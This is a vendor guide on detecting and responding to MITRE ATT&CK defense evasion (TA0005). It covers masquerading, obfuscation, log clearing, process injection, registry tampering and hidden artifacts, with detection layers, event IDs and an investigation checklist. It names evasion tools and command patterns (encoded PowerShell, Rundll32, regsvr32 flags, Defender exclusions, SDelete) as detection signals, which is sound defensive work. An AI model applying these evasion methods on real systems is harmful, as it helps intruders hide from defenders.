Defense Evasion (TA0005): Detection and response guide

What is defense evasion (TA0005)?

Defense evasion is the collection of techniques adversaries use to avoid detection, bypass security controls, and remove the evidence of their activity. In MITRE ATT&CK®, it maps to tactic TA0005 and holds the distinction of being the largest tactic in the framework by technique count. Log360 maps 963+ pre-built correlation rules to this tactic, covering Windows, Active Directory, AWS, Microsoft 365, and network device platforms.

The core challenge with defense evasion is that most techniques exploit trust relationships that already exist in the operating system. An attacker using Rundll32 to load a malicious DLL looks nearly identical to Windows doing the same thing for a legitimate library load. A process named svchost.exe running from a temp folder is suspicious, but the detection logic needs to know what legitimate svchost behavior looks like to surface that anomaly. This is why detection requires both rule-based correlation and behavioral baselines working together.

Why it matters in 2026

Defense evasion does not generate the same headlines as ransomware or data breaches, but it is the reason those attacks succeed. A threat actor who can keep their tools hidden, their processes camouflaged, and their log trail clean will have free run of a network for days or weeks before any alert fires. The 2025 IBM Cost of a Data Breach Report found the global average dwell time for attackers who were not detected by the victim's own team was 194 days. Defense evasion is the primary reason that number stays so high.

Three reasons this tactic deserves dedicated detection investment:

• It enables every other tactic. Credential access, lateral movement, and exfiltration all depend on the attacker remaining undetected long enough to operate. Defense evasion is the mechanism that buys that time.
• Security tool tampering removes your visibility. When an attacker kills an endpoint agent, adds a Defender exclusion, or clears Security event logs, the gap in your SIEM is itself evidence of a breach. A silent endpoint is often more alarming than a noisy one.
• LOLBin abuse is accelerating. Living-off-the-land techniques that abuse trusted Windows binaries have grown significantly as endpoint detection has improved. Using a signed Microsoft binary to proxy-execute a payload bypasses signature-based detection entirely, requiring behavioral correlation rules to catch it.

How defense evasion works

The 963+ TA0005 rules in Log360 cover dozens of sub-techniques. Six technique areas account for the largest share of real-world evasion activity and detection rule coverage in this cluster: masquerading, obfuscated files or information, indicator removal, process injection, modify registry, and hide artifacts.

1. Masquerading (T1036)

Masquerading covers any attempt to disguise a malicious file, process, or task as something legitimate. The simplest form is renaming a malware executable to a known-good process name like svchost.exe or explorer.exe and placing it in a system-like directory. More sophisticated variants involve naming malicious scheduled tasks or services after common Windows components so they blend into baseline noise.

Log360's masquerading detection covers 30+ rules, including several classified as Critical severity. Key behavioral indicators targeted include processes claiming to be system binaries but running from non-standard paths, explorer.exe spawned as a child process (which is not valid system behavior), and LOLBAS tool chains where wsmprovhost spawns unexpected children. The correlation engine matches process names against known-safe parent-child relationships and known-safe execution paths to surface these anomalies.

2. Obfuscated files or information (T1027)

Obfuscated files or information covers any method of encoding, encrypting, or structurally transforming payloads, scripts, and commands to defeat signature-based detection. PowerShell commands encoded in Base64, compile-after-delivery using csc.exe to produce malicious .NET assemblies on the victim host, software packing, and character-join command obfuscation all fall under T1027. Log360 maps 60+ correlation rules to this technique, with detection built around Script Block Logging (Event ID 4104) which captures deobfuscated content at execution time regardless of encoding method. Dedicated rules cover known obfuscation frameworks such as Invoke-Obfuscation and threat actor tooling including Winnti dropper activity.

3. Indicator removal (T1070)

Indicator removal covers all actions designed to destroy forensic evidence: clearing Windows Security event logs (Event ID 1102), deleting .evtx log files directly, wiping PowerShell console history, removing web server access logs, and using secure deletion tools like SDelete to overwrite files before deletion. A key advantage of centralized SIEM architecture is that events forwarded before clearing occurs remain preserved — the local log clear cannot affect the SIEM record. Log360's indicator removal rules surface the clearing actions themselves, making the anti-forensic attempt self-evidencing.

4. Process injection (T1055)

Process injection covers techniques where adversaries inject malicious code into legitimate running processes, executing under the host process's security context and identity. Methods include DLL injection, process hollowing (creating a suspended legitimate process and replacing its memory with malicious code), thread execution hijacking, and shellcode injection via CreateRemoteThread. Detection relies on Sysmon Event ID 8 (CreateRemoteThread), Event ID 10 (ProcessAccess), and behavioral anomalies like network connections initiated by processes that have no legitimate reason to reach the network. Log360 maps 39+ rules to T1055.

5. Modify registry (T1112)

Modify registry covers attacker interaction with the Windows Registry to disable security controls, store payloads, configure remote access, establish persistence, or disrupt forensic analysis. Targeted registry paths include Windows Defender policy keys, audit configuration, LSA authentication settings, and RDP configuration. Log360 maps 70+ rules to T1112 using Sysmon Event ID 12/13/14 for real-time registry change monitoring, covering tool-based detection (reg.exe, PowerShell registry cmdlets) and path-based detection (modifications to high-value keys regardless of the tool used).

6. Hide artifacts (T1564)

Hide artifacts covers techniques that prevent malicious files, processes, and users from appearing through standard system enumeration. Methods include setting Hidden and System file attributes with attrib.exe, storing executables in NTFS alternate data streams invisible to directory listings, running processes with hidden windows (-WindowStyle Hidden), creating hidden user accounts, and running malicious workloads inside Hyper-V virtual machines invisible to host monitoring. Log360 maps 35+ rules to T1564, catching concealment actions at the moment they are applied.

---

Key techniques under TA0005

The table below summarizes the six defense evasion technique areas covered in this cluster, along with detection difficulty and Log360's rule coverage for each:

Detection strategies for defense evasion

Defense evasion detection requires a layered approach. Any single detection method leaves gaps because the techniques are specifically designed to defeat individual controls. The layers below are complementary, each addresses a different class of evasion behavior.

Layer 1: Process behavioral analysis

The majority of defense evasion activity on Windows endpoints leaves a trace in process creation events (Event ID 4688 or Sysmon Event ID 1). Parent-child process relationships, process names relative to execution paths, and command-line argument patterns are the primary detection surfaces. Collecting these events into a SIEM and applying correlation rules that encode expected process lineage is the foundation of defense evasion detection.

Key fields to capture and correlate:

• Process name vs. execution path: svchost.exe running from C:\Users\Public is not a legitimate system process. Log360 compares process names against expected parent directories for all high-value system binaries.
• Parent-child legitimacy: Office applications spawning cmd.exe or wscript.exe is almost never legitimate behavior in a secure environment. Log360 ships rules for all major Office-spawning-script patterns classified as Critical.
• Command-line arguments: Encoded PowerShell (-EncodedCommand), DLL loads from temp paths via Rundll32, and regsvr32 with /s /u flags are high-signal patterns covered by dedicated rules.

Layer 2: Security control integrity monitoring

When an attacker modifies your security tooling, the modification itself is detectable. Audit policy changes (Event ID 4719), Defender real-time protection disabling (Windows Defender operational log), and service stop commands against known security processes all produce discrete log events that Log360 monitors with dedicated security monitoring rules. Treat any of these events as a high-priority investigation trigger.

Layer 3: Log integrity monitoring

Log clearing is a classic defense evasion sub-technique. Event ID 1102 (Security log cleared) and Event ID 104 (System log cleared) are single-event indicators that require no threshold or aggregation logic: one occurrence is a high-severity finding. Log360 monitors both events continuously and fires an immediate alert on detection. Gaps in log continuity (a host that stops forwarding logs unexpectedly) are also surfaced through Log360's log collection health monitoring.

Layer 4: UEBA behavioral baselines

The most sophisticated defense evasion techniques produce no discrete high-confidence events. An attacker who uses legitimate credentials, legitimate tools, and legitimate processes, but in slightly unusual patterns, requires behavioral detection. Log360's UEBA engine builds per-entity baselines covering process execution patterns, network connection profiles, and resource access behavior. Deviations from these baselines, even subtle ones, generate risk scores that surface for analyst review.

Log360 detection rules — TA0005 reference

Log360 ships 963+ correlation rules mapped to TA0005 defense evasion. The table below lists the highest-signal rules across the six technique areas covered in this cluster, sorted by technique.

Investigation and response

When a defense evasion alert fires, the immediate goal is to determine whether the evasion attempt is part of an active intrusion or an isolated misconfiguration. Speed matters: an attacker who has successfully impaired defenses is in an unmonitored state. Response time is measured in minutes, not hours.

Investigation checklist

1. Identify the process and account: What process triggered the alert? What user account was associated with it? Check whether this account has made similar requests before and whether it is expected to run the triggering process.
2. Check the execution path: Is the binary running from its expected location? A process named svchost.exe in C:\Users or C:\Temp is a red flag regardless of the process name match. Validate path against known-good baseline.
3. Review the process lineage: What spawned the suspicious process? Office applications spawning cmd.exe or PowerShell are high-confidence indicators of a macro dropper or phishing payload. Trace back to the root parent.
4. Assess the scope of evasion: What specifically was the attacker trying to hide? Log clearing (T1070) suggests an attempt to destroy forensic history. Registry tampering (T1112) may indicate persistence or security tool disabling. Process injection (T1055) suggests code is running under a legitimate process identity. Obfuscated execution (T1027) indicates payload delivery was attempted. Follow the alert context to determine which evasion layer was activated.
5. Search for concurrent activity: Defense evasion does not occur in isolation. Query Log360 for correlated events on the same host within the same 30-minute window: new scheduled tasks, registry modifications, outbound connections to uncommon destinations, and new account creations are all relevant.
6. Determine lateral scope: If the affected host is not isolated, check whether the evasion-enabling activity has been replicated to other hosts (e.g., GPO-deployed Defender exclusions, domain-wide service stops via PsExec, or a deployment to multiple endpoints via a compromised management tool).

Response actions

• Immediate containment: If evasion is confirmed as part of an active intrusion, isolate the affected host. Re-enable any disabled security controls and restore audit policy settings before detaching from the network, so that subsequent forensic collection captures complete telemetry.
• Restore security controls: Re-enable Defender real-time protection, restore the modified audit policy to baseline, and restart any stopped security services. Verify that endpoint agent heartbeats resume from the host.
• Preserve evidence: Capture memory and disk images before remediation if forensic analysis is required. Defense evasion techniques often destroy log evidence as part of their operation, so collect volatile data first.
• Threat hunt for persistence: Assume that any successful defense evasion attempt had a follow-on phase. Hunt for new scheduled tasks, new services, new startup registry entries, and new local admin accounts created in the same timeframe on the affected host and its network neighbors.
• Review registry and GPO changes: For T1112 (modify registry) events that affect multiple hosts simultaneously, check whether the change originated from a group policy modification or a deployment tool. Domain-wide registry changes to security policy keys are a high-severity finding requiring immediate Active Directory investigation.

Need to explore ManageEngine Log360? Schedule a personalized demo

Frequently asked questions